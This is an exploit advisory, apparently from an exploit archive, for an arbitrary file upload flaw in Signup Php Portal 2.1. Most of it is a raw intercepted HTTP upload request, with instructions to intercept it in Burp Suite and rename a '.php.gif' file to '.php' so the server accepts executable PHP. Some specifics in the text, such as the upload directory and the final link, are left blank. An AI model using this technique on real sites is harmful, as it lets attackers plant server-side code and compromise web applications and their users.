# Exploit Title: Signup Php Portal Arbitrary File Upload  
# Google Dork: N/A  
# Date: 19/12/2021  
# Exploit Author: Sohel Yousef -  
# Software Link:  
# Software Demo :  
# Category: webapps  
# Version: 2.1  
1. Description  
Signup Php Portal script contain arbitrary file upload  
using the form you can upload php files and bypass secuirty with burb suite intercept tool  
signup link :  
in the section of other images upload your file.php.gif and use intercept tool in burbsuite to edit the raw  
POST /signup_custom_script/upload.php HTTP/1.1  
Host: host  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0  
Accept: */*  
Accept-Language: ar,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------232155580731505179933631361962  
Content-Length: 294712  
Origin: https://localhost  
Connection: close  
Referer: https://localhost/signup_custom_script/customer_register.php  
Cookie: language=en-gb; currency=GBP; PHPSESSID=055209d5effdb7d44487349cbd66243e  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Content-Disposition: form-data; name="name"  
p1fna9ivqhk6g1fbjqto1f711ooq9.gif <<<<<------- REMOVE .GIF AND EDIT THIS TO .PHP  
Content-Disposition: form-data; name="file"; filename="2.php.gif" <<<<<------- REMOVE .GIF AND EDIT THIS TO .PHP  
Content-Type: image/gif  
forward and all done   
your file name will be   
and this is the upload dir   
your file will be on this link